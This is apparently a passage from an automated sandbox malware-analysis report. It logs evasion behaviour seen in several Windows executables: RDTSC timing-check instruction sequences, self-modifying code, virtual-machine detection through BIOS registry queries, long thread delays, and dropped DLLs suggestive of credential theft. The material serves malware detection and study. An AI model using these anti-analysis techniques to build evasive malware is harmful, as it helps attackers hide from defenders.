Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E05E second address: 86E06F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E06F second address: 86E073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E1F4 second address: 86E219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F702D6C0E52h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E4F0 second address: 86E4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F702C87CB96h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E787 second address: 86E78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E78D second address: 86E79D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CB9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E79D second address: 86E7B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E50h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E7B4 second address: 86E7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CB9Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 870EA2 second address: 870F70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F702D6C0E53h 0x0000000f nop 0x00000010 movzx ecx, cx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F702D6C0E48h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f cld 0x00000030 push 4B26875Ch 0x00000035 jmp 00007F702D6C0E52h 0x0000003a xor dword ptr [esp], 4B2687DCh 0x00000041 push edx 0x00000042 jmp 00007F702D6C0E4Bh 0x00000047 pop ecx 0x00000048 push 00000003h 0x0000004a or ecx, dword ptr [ebp+122D2C0Ah] 0x00000050 push 00000000h 0x00000052 mov ecx, dword ptr [ebp+122D2D6Ah] 0x00000058 push 00000003h 0x0000005a mov di, 5EA1h 0x0000005e mov di, cx 0x00000061 push 7FD79112h 0x00000066 jmp 00007F702D6C0E4Fh 0x0000006b add dword ptr [esp], 40286EEEh 0x00000072 mov ecx, edx 0x00000074 lea ebx, dword ptr [ebp+12455DA4h] 0x0000007a mov esi, dword ptr [ebp+122D2A84h] 0x00000080 mov dword ptr [ebp+122D238Ch], esi 0x00000086 xchg eax, ebx 0x00000087 push ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a jns 00007F702D6C0E46h 0x00000090 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 871005 second address: 87103C instructions: 0x00000000 rdtsc 0x00000002 js 00007F702C87CB98h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F702C87CB9Eh 0x00000014 jo 00007F702C87CB96h 0x0000001a popad 0x0000001b pop edx 0x0000001c nop 0x0000001d mov esi, eax 0x0000001f push 00000000h 0x00000021 mov si, 63BEh 0x00000025 push E15EFFC0h 0x0000002a pushad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 87103C second address: 8710B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702D6C0E53h 0x00000009 popad 0x0000000a jmp 00007F702D6C0E53h 0x0000000f popad 0x00000010 add dword ptr [esp], 1EA100C0h 0x00000017 call 00007F702D6C0E4Fh 0x0000001c push ebx 0x0000001d mov dh, 16h 0x0000001f pop edi 0x00000020 pop edi 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D38F7h], ebx 0x00000029 push 00000000h 0x0000002b push 00000003h 0x0000002d mov dword ptr [ebp+122D23D2h], eax 0x00000033 push 7DAA1DCCh 0x00000038 push edi 0x00000039 push ebx 0x0000003a push esi 0x0000003b pop esi 0x0000003c pop ebx 0x0000003d pop edi 0x0000003e add dword ptr [esp], 4255E234h 0x00000045 lea ebx, dword ptr [ebp+12455DADh] 0x0000004b adc edi, 254689D6h 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 pop edx 0x00000057 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 8710B9 second address: 8710BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 871189 second address: 871190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 871190 second address: 871195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 882222 second address: 882226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 867408 second address: 86741E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA2h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88E7B8 second address: 88E7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88E7BF second address: 88E7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88E969 second address: 88E985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d jng 00007F702D6C0E62h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88EC47 second address: 88EC74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA2h 0x00000007 jo 00007F702C87CB96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jo 00007F702C87CB96h 0x00000016 pop eax 0x00000017 pushad 0x00000018 jnp 00007F702C87CBA2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88EC74 second address: 88EC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88EC7A second address: 88EC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88EF0F second address: 88EF24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88F46B second address: 88F4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702C87CBA5h 0x00000009 popad 0x0000000a jno 00007F702C87CB9Ch 0x00000010 js 00007F702C87CBAEh 0x00000016 jmp 00007F702C87CBA2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88F60D second address: 88F61C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88FE5A second address: 88FE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F702C87CBA0h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88FE73 second address: 88FE8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Dh 0x00000007 pushad 0x00000008 jg 00007F702D6C0E46h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88FFCC second address: 88FFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 88FFD1 second address: 88FFDD instructions: 0x00000000 rdtsc 0x00000002 js 00007F702D6C0E4Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89048C second address: 89049B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F702C87CB9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 8935C4 second address: 8935CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 8935CA second address: 8935D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 8935D0 second address: 8935D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 8935D4 second address: 8935FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 8935FB second address: 893600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 859A9F second address: 859AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 859AA5 second address: 859AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 js 00007F702D6C0E4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89B2CA second address: 89B2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F702C87CBA2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F702C87CB9Ch 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89B2FD second address: 89B302 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89A998 second address: 89A9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F702C87CB96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89AB68 second address: 89AB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F702D6C0E46h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89AE40 second address: 89AE46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89AE46 second address: 89AE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89AE4E second address: 89AE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89AE52 second address: 89AE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89B104 second address: 89B109 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E592 second address: 89E596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E596 second address: 89E5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F702C87CB9Ch 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F702C87CBA1h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F702C87CBA7h 0x00000020 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E5DB second address: 89E60C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F702D6C0E52h 0x00000014 pop eax 0x00000015 call 00007F702D6C0E49h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E60C second address: 89E610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E610 second address: 89E616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E616 second address: 89E61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E940 second address: 89E94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F702D6C0E46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89E94F second address: 89E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 89EAD4 second address: 89EAF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702D6C0E59h 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A3FAFB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A3F9FE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BE12CC instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Special instruction interceptor: First address: 6EEF1E instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Special instruction interceptor: First address: 91D695 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 63EF1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 86D695 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 308B41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 308AA1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 4A42D3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 4A2E13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 4B45C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 308A6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 5337EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Special instruction interceptor: First address: 2FFAFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Special instruction interceptor: First address: 2FF9FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Special instruction interceptor: First address: 4A12CC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Special instruction interceptor: First address: 60DAAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Special instruction interceptor: First address: 7ACE1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Special instruction interceptor: First address: 847B32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 635DAAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 64FCE1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 6597B32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 62ADAAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 644CE1E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 64E7B32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Special instruction interceptor: First address: 6C5DAAD instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Memory allocated: 4830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Memory allocated: 4A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Memory allocated: 48B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Memory allocated: 4DE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Memory allocated: 4FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Memory allocated: 6FD0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe

Code function: 9_2_054E06DE rdtsc

9_2_054E06DE

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 7085	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1463	Jump to behavior
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Window / User API: threadDelayed 9868

Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\is-QG72D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-QVTBC.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\CH375DLL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-H7GRO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-B7T63.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\cairogfx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-AF5PH.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
